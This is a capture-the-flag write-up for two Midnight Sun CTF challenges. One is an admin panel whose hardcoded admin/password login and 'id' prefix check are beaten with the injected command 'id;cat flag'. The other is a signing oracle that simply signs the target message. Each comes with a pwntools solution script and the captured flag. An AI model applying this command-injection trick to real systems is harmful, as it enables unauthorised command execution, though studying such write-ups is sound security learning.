Pwn

Admpanel

We found this legacy admin panel. Someone has patched it though :(

We get an executable admpanel.

It gives us a panel, and there are two options. 1 for authentication, and 2 for executing commands. After using IDA pro, we can see that we need to authenticate first to execute commands, and the username and password are admin and password respectively.

For executing commands, it checks whether the first two characters of the command is id. So we can use id;cat flag as our command.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

from pwn import *

host = 'admpanel-01.play.midnightsunctf.se'
port = 31337

p = remote(host, port)

p.recvuntil(' > ')

# authenticate
p.sendline(str(1))
p.recv()
p.sendline('admin')
p.recv()
p.sendline('password')
p.recvuntil(' > ')

# execute command
p.sendline(str(2))
p.recv()
p.sendline('id;cat flag')
p.recv()
flag = p.recvline().rstrip()
print(flag)

p.close()

And we can get the flag midnight{n3v3r_4sk_b0bb_to_d0_S0m3TH4Ng}.


Crypto

Verifier

I created this really smooth service where you can get your messages verified and signed. It’s so simple to use.

There are three options. 1 for creating signatures, we can give it a message, and it will give us the signature. 2 for verification of the signature, we can give it a message and a signature, and it will tell us they match or not. 3 for getting the flag, we need to provide the signature of please_give_me_the_flag to get the flag.

It is pretty easy, we can get the flag by creating the signature of please_give_me_the_flag and submit it.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

from pwn import *

host = 'verifier-01.play.midnightsunctf.se'
port = 31337

p = remote(host, port)

p.recvuntil('> ')

# Create signature
p.sendline(str(1))
p.recvuntil('message> ')
p.sendline('please_give_me_the_flag')
signature = p.recv().split()[1].rstrip()

# Get flag
p.sendline(str(3))
p.recv()
p.sendline(signature)
flag = str(p.recv().split()[2].rstrip())
print(flag)

p.close()

And we can get the flag midnight{number_used_once_or_twice_or_more}